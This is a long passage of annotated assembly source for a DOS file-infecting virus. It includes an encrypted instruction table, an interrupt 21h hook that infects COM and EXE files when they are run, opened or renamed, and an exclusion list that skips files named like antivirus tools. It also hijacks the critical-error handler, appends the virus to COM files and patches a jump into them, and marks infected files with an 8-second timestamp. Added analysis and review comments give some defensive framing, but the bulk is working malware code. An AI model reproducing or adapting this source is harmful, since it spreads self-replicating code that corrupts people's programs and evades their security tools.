        lea bx,[bp+1234h] ; BX = offset of jmp_imm32_
        db 11101101b ; Data reference
        dw 1391h ; Pointer of jmp_imm32_
        db 01h ; One byte instruction
        pop ax ; Load AX from stack (initial IP)
        db 04h ; Four bytes instruction
        mov cs:[bx+01h],ax ; Store initial IP
        db 01h ; One byte instruction
        pop ax ; Load AX from stack (initial CS ...)
        db 04h ; Four bytes instruction
        mov cs:[bx+03h],ax ; Store initial CS relative to sta...
; TMC table entries, one statement per line: `db n` gives the length of the
; instruction that follows and `db n+10h` announces n bytes of data.
;
; The entries up to the first "End of block" finish virus_exit_: the host's
; stack (SS:SP) is restored from the stack and control passes to jmp_imm32_.
        db 01h ; One byte instruction
        pop ax ; Load AX from stack (initial SP)
        db 01h ; One byte instruction
        pop ss ; Load SS from stack (initial SS ...)
        db 02h ; Two bytes instruction
        mov sp,ax ; SP = stack pointer
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 1391h ; Pointer of jmp_imm32_
        db 11101111b ; End of block

; jmp_imm32_: a far JMP stored as data. Its four-byte operand is zero here;
; virus_exit_ writes an initial IP and CS into it before jumping to it.
jmp_imm32_ db 11101110b ; Beginning of block
        dw 1391h ; Block identification of jmp_imm32_
        db 05h+10h ; Five bytes data
        db 11101010b ; JMP imm32 (opcode 0eah)
        dd 00h ; Pointer to virus in top of memory
        db 11101111b ; End of block

; ah__: scratch byte in which decrypt_byt keeps the caller's AH.
ah__ db 11101110b ; Beginning of block
        dw 0bd9h ; Block identification of ah__
        db 01h+10h ; One byte data
        db 00h ; Accumulator register (high-orde...)
        db 11101111b ; End of block

probability_ db 11101110b ; Beginning of block
        dw 0bech ; Block identification of probability_
        db 02h+10h ; Two bytes data
        dw 32h ; Probability
        db 11101111b ; End of block

; crypt_key_ / sliding_key_: the two table-encryption keys. Both are zero in
; the source; crypt_table stores fresh values from get_rnd_num_ at run time.
crypt_key_ db 11101110b ; Beginning of block
        dw 0bd7h ; Block identification of crypt_key_
        db 01h+10h ; One byte data
        db 00h ; 8-bit encryption/decryption key
        db 11101111b ; End of block

; Declared as a word because decrypt_byt reads it with a word-sized MUL.
sliding_key_ db 11101110b ; Beginning of block
        dw 0bd8h ; Block identification of sliding_key_
        db 02h+10h ; Two bytes data
        dw 00h ; 8-bit sliding encryption/decrypt...
        db 11101111b ; End of block

; executa_sta: the infection code stores 00h for a COM host and 01h for an
; EXE host here.
executa_sta db 11101110b ; Beginning of block
        dw 1388h ; Block identification of executa_sta
        db 01h+10h ; One byte data
        db 00h ; Executable status
        db 11101111b ; End of block

; origin_code_: three-byte buffer; the infection code reads the first three
; bytes of the target file into it. Default content is RET (0c3h) followed
; by two zero bytes.
origin_code_ db 11101110b ; Beginning of block
        dw 1f40h ; Block identification of origin_code_
        db 03h+10h ; Three bytes data
        db 11000011b,00000010b dup(00h)
        db 11101111b ; End of block

; initial_cs_ / initial_ss_: defaults of 0fff0h; for an EXE host they are
; overwritten with the values taken from the file's header.
initial_cs_ db 11101110b ; Beginning of block
        dw 1389h ; Block identification of initial_cs_
        db 02h+10h ; Two bytes data
        dw 0fff0h ; Initial CS relative to start of ...
        db 11101111b ; End of block

initial_ss_ db 11101110b ; Beginning of block
        dw 138ah ; Block identification of initial_ss_
        db 02h+10h ; Two bytes data
        dw 0fff0h ; Initial SS relative to start of ...
; TMC table entries, one statement per line. Every block below is a two-byte
; data cell (`db 02h+10h` announces two bytes of data). The values are the
; defaults; the COM path of the infection code writes 100h, 0fffeh, 1000h and
; 0ffffh into initial_ip_, initial_sp_, new_mcb_siz and mcb_size__, and the
; EXE path replaces them with values derived from the file's header.
        db 11101111b ; End of block

initial_ip_ db 11101110b ; Beginning of block
        dw 138bh ; Block identification of initial_ip_
        db 02h+10h ; Two bytes data
        dw 100h ; Initial IP
        db 11101111b ; End of block

; incorrec_ip: written by the EXE path as the header's initial IP plus a
; random value below 40h when the probability_ test allows it.
incorrec_ip db 11101110b ; Beginning of block
        dw 1773h ; Block identification of incorrec_ip
        db 02h+10h ; Two bytes data
        dw 100h ; Incorrect IP
        db 11101111b ; End of block

initial_sp_ db 11101110b ; Beginning of block
        dw 138ch ; Block identification of initial_sp_
        db 02h+10h ; Two bytes data
        dw 0fffeh ; Initial SP
        db 11101111b ; End of block

new_mcb_siz db 11101110b ; Beginning of block
        dw 1393h ; Block identification of new_mcb_siz
        db 02h+10h ; Two bytes data
        dw 1000h ; New size in paragraphs
        db 11101111b ; End of block

mcb_size__ db 11101110b ; Beginning of block
        dw 1395h ; Block identification of mcb_size__
        db 02h+10h ; Two bytes data
        dw 0ffffh ; Size of memory block in paragraphs
        db 11101111b ; End of block

mcb_size___ db 11101110b ; Beginning of block
        dw 1394h ; Block identification of mcb_size___
        db 02h+10h ; Two bytes data
        dw 00h ; Size of memory block in paragraphs
        db 11101111b ; End of block

; program_seg_: its data bytes follow in the next entries.
program_seg_ db 11101110b ; Beginning of block
        dw 0befh ; Block identification of program_seg_
; TMC table entries, one statement per line: `db n` gives the length of the
; instruction that follows, `db n+10h` announces n bytes of data.
;
; The first three entries are the data of program_seg_, whose block header
; precedes them.
        db 02h+10h ; Two bytes data
        dw 00h ; Segment of PSP for current process
        db 11101111b ; End of block

virus_lengt db 11101110b ; Beginning of block
        dw 0bf0h ; Block identification of virus_lengt
        db 02h+10h ; Two bytes data
        dw 00h ; Length of virus
        db 11101111b ; End of block

vir_exit_of db 11101110b ; Beginning of block
        dw 0bf1h ; Block identification of vir_exit_of
        db 02h+10h ; Two bytes data
        dw 00h ; Offset of virus_exit_
        db 11101111b ; End of block

; tmc_table_: an empty block whose identification (4c5h) is the one that
; decrypt_byt and crypt_table_ reference as the start of the table.
tmc_table_ db 11101110b ; Beginning of block
        dw 4c5h ; Block identification of tmc_table_
        db 11101111b ; End of block
        db 00h ; End of table
second_table db 11101111b ; End of block
virus_end:

; crypt_table (first part; the block continues in the following entries):
; with BP = 0 and DS = CS it calls crypt_table_ using the keys currently
; stored, obtains a new random word from get_rnd_num_ and stores its low
; byte as crypt_key_ and its high byte as sliding_key_.
; NOTE(review): the first call presumably removes the encryption applied with
; the old keys before new ones are chosen - confirm against crypt_loop.
crypt_table db 11101110b ; Beginning of block
        dw 66h ; Block identification of crypt_table
        db 02h ; Two bytes instruction
        xor bp,bp ; BP = delta offset
        db 01h ; One byte instruction
        push cs ; Save CS at stack
        db 01h ; One byte instruction
        pop ds ; Load DS from stack
        db 11101000b ; CALL imm16 (opcode 0e8h)
        dw 0bfeh ; Pointer to crypt_table_
        db 11101000b ; CALL imm16 (opcode 0e8h)
        dw 0bd4h ; Pointer to get_rnd_num_
        db 03h ; Three bytes instruction
        mov ds:[1234h],al ; Store 8-bit encryption/decryptio...
        db 11101101b ; Data reference
        dw 0bd7h ; Pointer to crypt_key_
        db 04h ; Four bytes instruction
        mov ds:[1234h],ah ; Store 8-bit sliding encryption/d...
; TMC table entries, one statement per line: `db n` gives the length of the
; instruction that follows; CALL / JMP / Jcc / data-reference markers are
; followed by a 16-bit block identification rather than a real offset.
;
; The entries up to the first "End of block" finish crypt_table: the table is
; passed through crypt_table_ again with the new keys (AL/AH still hold them),
; the current interrupt 21h vector is saved into the operand of the far JMP
; at int21_jump, the vector is pointed at int21_virus and control goes to
; virus_exit_.
; Analysis note: after this point every DOS call passes through int21_virus,
; so an interrupt 21h vector that leads into this code is a residency
; indicator.
        db 11101101b ; Data reference
        dw 0bd8h ; Pointer to sliding_key_
        db 11101000b ; CALL imm16 (opcode 0e8h)
        dw 0bfeh ; Pointer to crypt_table_
        db 03h ; Three bytes instruction
        mov ax,3521h ; Get interrupt vector 21h
        db 02h ; Two bytes instruction
        int 21h
        db 03h ; Three bytes instruction
        mov di,1234h ; DI = offset of int21_jump
        db 11101101b ; Data reference
        dw 0c9h ; Pointer to int21_jump
        db 03h ; Three bytes instruction
        mov [di+01h],bx ; Store offset of interrupt 21h
        db 03h ; Three bytes instruction
        mov [di+03h],es ; Store segment of interrupt 21h
        db 03h ; Three bytes instruction
        mov dx,1234h ; DX = offset of int21_virus
        db 11101101b ; Data reference
        dw 0c8h ; Pointer to int21_virus
        db 03h ; Three bytes instruction
        mov ax,2521h ; Set interrupt vector 21h
        db 02h ; Two bytes instruction
        int 21h
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 65h ; Pointer to virus_exit_
        db 11101111b ; End of block

; crypt_table_: sets SI to tmc_table_ and CX to the table length, then falls
; into crypt_loop. Expects the key in AL and the per-byte increment in AH.
crypt_table_ db 11101110b ; Beginning of block
        dw 0bfeh ; Block identification of crypt_table_
        db 03h ; Three bytes instruction
        mov si,1234h ; SI = offset of tmc_table_
        db 11101101b ; Data reference
        dw 4c5h ; Pointer to tmc_table_
        db 03h ; Three bytes instruction
        mov cx,(code_end-first_table) ; CX = number of table bytes to process
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 0bffh ; Pointer to crypt_loop
        db 11101111b ; End of block

; crypt_loop: XORs each table byte with AL and adds AH to AL after every
; byte, so the key for byte i is (initial AL + i * AH) modulo 256. XOR is its
; own inverse, so the same loop serves for encryption and decryption.
crypt_loop db 11101110b ; Beginning of block
        dw 0bffh ; Block identification of crypt_loop
        db 02h ; Two bytes instruction
        xor [si],al ; Encrypt byte of table
        db 01h ; One byte instruction
        inc si ; Increase offset within table
        db 02h ; Two bytes instruction
        add al,ah ; Add 8-bit sliding encryption key...
        db 01h ; One byte instruction
        dec cx ; Decrease counter
        db 01110101b+10000000b ; Not zero? Jump to crypt_loop
        dw 0bffh ; Pointer to crypt_loop
        db 01h ; One byte instruction
        ret ; Return
        db 11101111b ; End of block

; int21_virus: the interrupt 21h handler. It saves all general and segment
; registers and continues at find_zero only for functions 4bh (load and/or
; execute), 56h (rename) and 3dh (open); every other function goes straight
; to int21_exit.
; NOTE(review): the file header lists "close file" as an infection trigger,
; but the function tested here is 56h (rename), not 3eh - confirm which is
; intended.
int21_virus db 11101110b ; Beginning of block
        dw 0c8h ; Block identification of int21_virus
        db 01h ; One byte instruction
        push ax ; Save AX at stack
        db 01h ; One byte instruction
        push bx ; Save BX at stack
        db 01h ; One byte instruction
        push cx ; Save CX at stack
        db 01h ; One byte instruction
        push dx ; Save DX at stack
        db 01h ; One byte instruction
        push si ; Save SI at stack
        db 01h ; One byte instruction
        push di ; Save DI at stack
        db 01h ; One byte instruction
        push ds ; Save DS at stack
        db 01h ; One byte instruction
        push es ; Save ES at stack
        db 01h ; One byte instruction
        cld ; Clear direction flag
        db 03h ; Three bytes instruction
        cmp ah,4bh ; Load and/or execute program?
        db 01110100b+10000000b ; Equal? Jump to find_zero
        dw 1392h ; Pointer to find_zero
        db 03h ; Three bytes instruction
        cmp ah,56h ; Rename file?
        db 01110100b+10000000b ; Equal? Jump to find_zero
        dw 1392h ; Pointer to find_zero
        db 03h ; Three bytes instruction
        cmp ah,3dh ; Open file?
        db 01110101b+10000000b ; Not equal? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 1392h ; Pointer to find_zero
        db 11101111b ; End of block

; find_zero (first part; the block continues in the following entries):
; scans at most 43h bytes from DS:DX for the terminating zero of the filename
; and gives up (int21_exit) if none is found. SI is then set five bytes
; before the position after the zero, i.e. where the dot of a three-letter
; extension would be.
find_zero db 11101110b ; Beginning of block
        dw 1392h ; Block identification of find_zero
        db 01h ; One byte instruction
        push ds ; Save DS at stack
        db 01h ; One byte instruction
        pop es ; Load ES from stack (DS)
        db 02h ; Two bytes instruction
        mov di,dx ; DI = offset of filename
        db 03h ; Three bytes instruction
        mov cx,43h ; CX = number of bytes to search t...
        db 02h ; Two bytes instruction
        xor al,al ; Zero AL
        db 02h ; Two bytes instruction
        repne scasb ; Find end of filename
        db 01110101b+10000000b ; Not equal? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        lea si,[di-05h] ; SI = offset of the dot in the fi...
; TMC table entries, one statement per line: `db n` gives the length of the
; instruction that follows; CALL / JMP / Jcc / data-reference markers are
; followed by a 16-bit block identification rather than a real offset.
;
; The entries up to the first "End of block" finish find_zero: the two bytes
; at SI (dot plus first extension letter) are lowercased and compared with
; ".c" and ".e"; BX is preloaded with the remaining two letters ("om"/"xe")
; for examine_ext. Anything else leaves through int21_exit.
        db 01h ; One byte instruction
        lodsw ; AX = two bytes of filename
        db 03h ; Three bytes instruction
        or ax,2020h ; Lowercase characters
        db 03h ; Three bytes instruction
        mov bx,'mo' ; COM executable
        db 03h ; Three bytes instruction
        cmp ax,'c.' ; COM executable?
        db 01110100b+10000000b ; Equal? Jump to examine_ext
        dw 0f0h ; Pointer to examine_ext
        db 03h ; Three bytes instruction
        mov bx,'ex' ; EXE executable
        db 03h ; Three bytes instruction
        cmp ax,'e.' ; EXE executable?
        db 01110100b+10000000b ; Equal? Jump to examine_ext
        dw 0f0h ; Pointer to examine_ext
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 0fbh ; Pointer to int21_exit
        db 11101111b ; End of block

; examine_ext: checks the last two extension letters against BX and moves SI
; back to the dot before searching for the start of the name.
examine_ext db 11101110b ; Beginning of block
        dw 0f0h ; Block identification of examine_ext
        db 01h ; One byte instruction
        lodsw ; AX = two bytes of filename
        db 03h ; Three bytes instruction
        or ax,2020h ; Lowercase characters
        db 02h ; Two bytes instruction
        cmp ax,bx ; COM or EXE executable?
        db 01110101b+10000000b ; Not equal? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        sub si,04h ; SI = offset of the dot in the fi...
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 1398h ; Pointer to find_name
        db 11101111b ; End of block

; find_name: walks SI backwards from the dot until it meets '/', '\' or ':'
; or reaches the start of the string at DX.
find_name db 11101110b ; Beginning of block
        dw 1398h ; Block identification of find_name
        db 01h ; One byte instruction
        dec si ; SI = offset within filename
        db 02h ; Two bytes instruction
        mov al,[si] ; AL = byte of filename
        db 02h ; Two bytes instruction
        cmp al,'/' ; Beginning of filename?
        db 01110100b+10000000b ; Equal? Jump to examine_name
        dw 1397h ; Pointer to examine_name
        db 02h ; Two bytes instruction
        cmp al,'\' ; Beginning of filename?
        db 01110100b+10000000b ; Equal? Jump to examine_name
        dw 1397h ; Pointer to examine_name
        db 02h ; Two bytes instruction
        cmp al,':' ; Beginning of filename?
        db 01110100b+10000000b ; Equal? Jump to examine_name
        dw 1397h ; Pointer to examine_name
        db 02h ; Two bytes instruction
        cmp si,dx ; Beginning of filename?
        db 01110111b+10000000b ; Above? Jump to find_name
        dw 1398h ; Pointer to find_name
        db 01h ; One byte instruction
        dec si ; SI = offset within filename
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 1397h ; Pointer to examine_name
        db 11101111b ; End of block

; examine_name: exclusion list followed by the start of the infection routine.
; Only the FIRST TWO characters of the file name are compared (lowercased),
; so any COM/EXE whose name begins with one of these pairs is left alone.
; As with 'c.' above, the second character of each constant is the first
; character of the name ('on' matches names starting with "no").
; NOTE(review): the constants are XORed with 0aa55h, presumably so the name
; pairs do not appear as plain text in the code - confirm.
examine_name db 11101110b ; Beginning of block
        dw 1397h ; Block identification of examine_name
        db 01h ; One byte instruction
        inc si ; SI = offset of beginning of file...
        db 01h ; One byte instruction
        lodsw ; AX = two bytes of filename
        db 03h ; Three bytes instruction
        or ax,2020h ; Lowercase characters
        db 03h ; Three bytes instruction
        xor ax,0aa55h ; Encrypt two bytes of filename
        db 03h ; Three bytes instruction
        cmp ax,('ci' xor 0aa55h) ; Name begins with "ic"? (program not named in the original comments)
        db 01110100b+10000000b ; Equal? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        cmp ax,('on' xor 0aa55h) ; Name begins with "no"?
        db 01110100b+10000000b ; NOD-iCE? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        cmp ax,('ew' xor 0aa55h) ; Name begins with "we"?
        db 01110100b+10000000b ; Dr. Web? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        cmp ax,('bt' xor 0aa55h) ; Name begins with "tb"?
        db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        cmp ax,('va' xor 0aa55h) ; Name begins with "av"?
        db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        cmp ax,('-f' xor 0aa55h) ; Name begins with "f-"?
        db 01110100b+10000000b ; F-PROT? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        cmp ax,('cs' xor 0aa55h) ; Name begins with "sc"?
        db 01110100b+10000000b ; McAfee ViruScan? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        cmp ax,('oc' xor 0aa55h) ; Name begins with "co"?
        db 01110100b+10000000b ; COMMAND.COM? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        cmp ax,('iw' xor 0aa55h) ; Name begins with "wi"?
        db 01110100b+10000000b ; WIN.COM? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit
        db 03h ; Three bytes instruction
        cmp ax,('rk' xor 0aa55h) ; Name begins with "kr"? (program not named in the original comments)
        db 01110100b+10000000b ; Equal? Jump to int21_exit
        dw 0fbh ; Pointer to int21_exit

; The interrupt 24h (critical error) vector is read and its old ES:BX value
; kept on the stack, then replaced with int24_virus while the file is
; handled; int24_store puts the old vector back.
        db 02h ; Two bytes instruction
        mov cx,ds ; CX = segment of filename
        db 01h ; One byte instruction
        push cs ; Save CS at stack
        db 01h ; One byte instruction
        pop ds ; Load DS from stack
        db 03h ; Three bytes instruction
        mov ax,3524h ; Get interrupt vector 24h
        db 02h ; Two bytes instruction
        int 21h
        db 01h ; One byte instruction
        push es ; Save ES at stack
        db 01h ; One byte instruction
        push bx ; Save BX at stack
        db 01h ; One byte instruction
        push dx ; Save DX at stack
        db 03h ; Three bytes instruction
        mov dx,1234h ; DX = offset of int24_virus
        db 11101101b ; Data reference
        dw 1770h ; Pointer to int24_virus
        db 03h ; Three bytes instruction
        mov ax,2524h ; Set interrupt vector 24h
        db 02h ; Two bytes instruction
        int 21h
        db 01h ; One byte instruction
        pop dx ; Load DX from stack

; The file is opened read/write through the saved original interrupt 21h
; address (int21_jump+1), not through INT 21h, so the handler does not
; re-enter itself: PUSHF followed by a far CALL behaves like an INT.
        db 02h ; Two bytes instruction
        mov ds,cx ; DS = segment of filename
        db 02h ; Two bytes instruction
        mov es,cx ; ES = segment of filename
        db 03h ; Three bytes instruction
        mov ax,3d02h ; Open file (read/write)
        db 03h ; Three bytes instruction
        mov bx,1234h ; BX = offset of int21_jump
        db 11101101b ; Data reference
        dw 0c9h ; Pointer to int21_jump
        db 01h ; One byte instruction
        inc bx ; BX = offset of address of interr...
        db 01h ; One byte instruction
        pushf ; Save flags at stack
        db 03h ; Three bytes instruction
        call dword ptr cs:[bx] ; Call original interrupt 21h handler
        db 01110010b+10000000b ; Error? Jump to int24_store
        dw 1771h ; Pointer to int24_store
        db 02h ; Two bytes instruction
        mov bx,ax ; BX = file handle
        db 01h ; One byte instruction
        push cs ; Save CS at stack
        db 01h ; One byte instruction
        pop ds ; Load DS from stack (CS)
        db 03h ; Three bytes instruction
        mov ax,5700h ; Get file's date and time
        db 02h ; Two bytes instruction
        int 21h
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 04h ; Four bytes instruction
        mov ds:[1234h],dx ; Store file's date
        db 11101101b ; Data reference
        dw 12dh ; Pointer to file_date
; Infection marker: the low five bits of the file time (seconds in two-second
; units) equal to 4, i.e. a timestamp of exactly 8 seconds. A file with this
; value is treated as already infected; otherwise the value is prepared here
; and written back by set_file_inf. Analysis note: an 8-second timestamp on a
; COM/EXE is a cheap triage indicator but not proof - clean files can carry it.
        db 02h ; Two bytes instruction
        mov al,cl ; AL = low-order byte of file time
        db 02h ; Two bytes instruction
        and al,00011111b ; AL = file seconds
        db 02h ; Two bytes instruction
        cmp al,00000100b ; Already infected (8 seconds)?
        db 01110100b+10000000b ; Equal? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 03h ; Three bytes instruction
        and cl,11100000b ; Zero file seconds
        db 03h ; Three bytes instruction
        or cl,00000100b ; Set infection mark (8 seconds)
        db 04h ; Four bytes instruction
        mov ds:[1234h],cx ; Store file's time
        db 11101101b ; Data reference
        dw 12ch ; Pointer to file_time
; The first three bytes of the file are read into origin_code_; an 'MZ' or
; 'ZM' signature selects infect_exe, anything else is handled as COM.
        db 02h ; Two bytes instruction
        mov ah,3fh ; Read from file
        db 03h ; Three bytes instruction
        mov cx,03h ; Read three bytes
        db 03h ; Three bytes instruction
        mov dx,1234h ; DX = offset of origin_code_
        db 11101101b ; Data reference
        dw 1f40h ; Pointer to origin_code_
        db 02h ; Two bytes instruction
        mov si,dx ; SI = offset of origin_code_
        db 02h ; Two bytes instruction
        int 21h
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 01h ; One byte instruction
        lodsw ; AX = EXE signature
        db 03h ; Three bytes instruction
        cmp ax,'ZM' ; EXE signature?
        db 01110100b+10000000b ; Equal? Jump to infect_exe
        dw 138dh ; Pointer to infect_exe
        db 03h ; Three bytes instruction
        cmp ax,'MZ' ; EXE signature?
        db 01110100b+10000000b ; Equal? Jump to infect_exe
        dw 138dh ; Pointer to infect_exe
; COM path: the per-host data cells are reset to their COM defaults, starting
; with initial_cs_.
        db 03h ; Three bytes instruction
        mov si,1234h ; SI = offset of initial_cs_
        db 11101101b ; Data reference
        dw 1389h ; Pointer to initial_cs_
        db 04h ; Four bytes instruction
        mov [si],0fff0h ; Store initial CS relative to sta...
; TMC table entries, one statement per line: `db n` gives the length of the
; instruction that follows, `db n+10h` announces n bytes of data; CALL / JMP /
; Jcc / data-reference markers are followed by a 16-bit block identification
; rather than a real offset.
;
; The entries up to the first "End of block" are the COM path of the file
; handling code that starts earlier in the file: the remaining per-host data
; cells are reset to COM defaults, the file size is checked, the body is
; written at end of file and the first three bytes of the file are replaced
; by a near JMP to it.
        db 03h ; Three bytes instruction
        mov si,1234h ; SI = offset of initial_ss_
        db 11101101b ; Data reference
        dw 138ah ; Pointer to initial_ss_
        db 04h ; Four bytes instruction
        mov [si],0fff0h ; Store initial SS relative to sta...
        db 03h ; Three bytes instruction
        mov si,1234h ; SI = offset of initial_ip_
        db 11101101b ; Data reference
        dw 138bh ; Pointer to initial_ip_
        db 04h ; Four bytes instruction
        mov [si],100h ; Store initial IP
        db 03h ; Three bytes instruction
        mov si,1234h ; SI = offset of initial_sp_
        db 11101101b ; Data reference
        dw 138ch ; Pointer to initial_sp_
        db 04h ; Four bytes instruction
        mov [si],0fffeh ; Store initial SP
        db 03h ; Three bytes instruction
        mov si,1234h ; SI = offset of mcb_size__
        db 11101101b ; Data reference
        dw 1395h ; Pointer to mcb_size__
        db 04h ; Four bytes instruction
        mov [si],0ffffh ; Store size of memory block in pa...
        db 03h ; Three bytes instruction
        mov si,1234h ; SI = offset of new_mcb_siz
        db 11101101b ; Data reference
        dw 1393h ; Pointer to new_mcb_siz
        db 04h ; Four bytes instruction
        mov [si],1000h ; Store new size in paragraphs
        db 02h ; Two bytes instruction
        mov al,00h ; COM executable
        db 03h ; Three bytes instruction
        mov ds:[1234h],al ; Store executable status
        db 11101101b ; Data reference
        dw 1388h ; Pointer to executa_sta
; Seek to end of file; the returned position in AX is the file size. COM
; files larger than 0e000h bytes are skipped.
        db 03h ; Three bytes instruction
        mov ax,4202h ; Set current file position (EOF)
        db 02h ; Two bytes instruction
        xor cx,cx ; CX = high-order word of offset f...
        db 02h ; Two bytes instruction
        xor dx,dx ; DX = low-order word of offset f...
        db 02h ; Two bytes instruction
        int 21h
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 03h ; Three bytes instruction
        cmp ax,0e000h ; Filesize too large?
        db 01110111b+10000000b ; Above? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 01h ; One byte instruction
        push ax ; Save AX at stack
        db 03h ; Three bytes instruction
        add ax,100h ; AX = delta offset
        db 03h ; Three bytes instruction
        mov ds:[01h],ax ; Store delta offset
        db 02h ; Two bytes instruction
        mov ah,40h ; Write to file
        db 02h ; Two bytes instruction
        xor dx,dx ; Zero DX
        db 03h ; Three bytes instruction
        mov cx,1234h ; CX = length of virus
        db 11101101b ; Data reference
        dw 66h ; Pointer to virus_end
        db 02h ; Two bytes instruction
        int 21h
        db 01h ; One byte instruction
        pop ax ; Load AX from stack (POP leaves the carry flag from int 21h intact)
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 01h ; One byte instruction
        push ax ; Save AX at stack
        db 03h ; Three bytes instruction
        mov ax,4200h ; Set current file position (SOF)
        db 02h ; Two bytes instruction
        xor cx,cx ; CX = high-order word of offset f...
        db 02h ; Two bytes instruction
        xor dx,dx ; DX = low-order word of offset fr...
        db 02h ; Two bytes instruction
        int 21h
        db 01h ; One byte instruction
        pop ax ; Load AX from stack
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
; origin_code_ is reused as the write buffer for the new three-byte file
; header: opcode 0e9h plus (original file size - 3) as the displacement.
; NOTE(review): at this point the buffer still holds the three original bytes
; read from the file; they are overwritten in memory here, so they must
; already have been captured in the body written above - confirm.
        db 03h ; Three bytes instruction
        mov di,1234h ; DI = offset of origin_code_
        db 11101101b ; Data reference
        dw 1f40h ; Pointer to origin_code_
        db 02h ; Two bytes instruction
        mov dx,di ; DX = offset of origin_code_
        db 03h ; Three bytes instruction
        mov byte ptr [di],11101001b ; Store JMP imm16 opcode (0e9h)
        db 03h ; Three bytes instruction
        sub ax,03h ; AX = offset of virus within infe...
        db 03h ; Three bytes instruction
        mov [di+01h],ax ; Store offset of virus within inf...
        db 03h ; Three bytes instruction
        mov cx,03h ; Write three bytes
        db 02h ; Two bytes instruction
        mov ah,40h ; Write to file
        db 02h ; Two bytes instruction
        int 21h
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 138eh ; Pointer to set_file_inf
        db 11101111b ; End of block

; set_file_inf: writes back the saved date and the time that carries the
; 8-second infection mark, so the file's visible date and time do not change
; apart from the seconds field.
set_file_inf db 11101110b ; Beginning of block
        dw 138eh ; Block identification of set_file_inf
        db 03h ; Three bytes instruction
        mov ax,5701h ; Set file's date and time
        db 04h ; Four bytes instruction
        mov cx,ds:[1234h] ; CX = new time
        db 11101101b ; Data reference
        dw 12ch ; Pointer to file_time
        db 04h ; Four bytes instruction
        mov dx,ds:[1234h] ; DX = new date
        db 11101101b ; Data reference
        dw 12dh ; Pointer to file_date
        db 02h ; Two bytes instruction
        int 21h
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 0fah ; Pointer to close_file
        db 11101111b ; End of block

close_file db 11101110b ; Beginning of block
        dw 0fah ; Block identification of close_file
        db 02h ; Two bytes instruction
        mov ah,3eh ; Close file
        db 02h ; Two bytes instruction
        int 21h
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 1771h ; Pointer to int24_store
        db 11101111b ; End of block

; int24_store: restores the interrupt 24h vector. DX and DS receive the
; offset and segment that were pushed (as BX and ES) when the vector was read.
int24_store db 11101110b ; Beginning of block
        dw 1771h ; Block identification of int24_store
        db 01h ; One byte instruction
        pop dx ; Load DX from stack
        db 01h ; One byte instruction
        pop ds ; Load DS from stack
        db 03h ; Three bytes instruction
        mov ax,2524h ; Set interrupt vector 24h
        db 02h ; Two bytes instruction
        int 21h
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 0fbh ; Pointer to int21_exit
        db 11101111b ; End of block

; int21_exit: restores the registers saved by int21_virus, in reverse order,
; and passes the unchanged request on to the original handler via int21_jump.
int21_exit db 11101110b ; Beginning of block
        dw 0fbh ; Block identification of int21_exit
        db 01h ; One byte instruction
        pop es ; Load ES from stack
        db 01h ; One byte instruction
        pop ds ; Load DS from stack
        db 01h ; One byte instruction
        pop di ; Load DI from stack
        db 01h ; One byte instruction
        pop si ; Load SI from stack
        db 01h ; One byte instruction
        pop dx ; Load DX from stack
        db 01h ; One byte instruction
        pop cx ; Load CX from stack
        db 01h ; One byte instruction
        pop bx ; Load BX from stack
        db 01h ; One byte instruction
        pop ax ; Load AX from stack
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 0c9h ; Pointer to int21_jump
        db 11101111b ; End of block

; int21_jump: far JMP stored as data; its operand is filled with the original
; interrupt 21h address when the handler is installed.
int21_jump db 11101110b ; Beginning of block
        dw 0c9h ; Block identification of int21_jump
        db 05h+10h ; Five bytes data
        db 11101010b ; JMP imm32 (opcode 0eah)
        dd 00h ; address of interrupt 21h
        db 11101111b ; End of block

; infect_exe (first part; the block continues in the following entries):
; marks the host as EXE, reads the first 18h bytes of the file into
; exe_header and starts computing the memory the original program needs.
; AX stays zero when the header's maximum-allocation field is 0ffffh.
infect_exe db 11101110b ; Beginning of block
        dw 138dh ; Block identification of infect_exe
        db 02h ; Two bytes instruction
        mov al,01h ; EXE executable
        db 03h ; Three bytes instruction
        mov ds:[1234h],al ; Store executable status
        db 11101101b ; Data reference
        dw 1388h ; Pointer to executa_sta
        db 03h ; Three bytes instruction
        mov ax,4200h ; Set current file position (SOF)
        db 02h ; Two bytes instruction
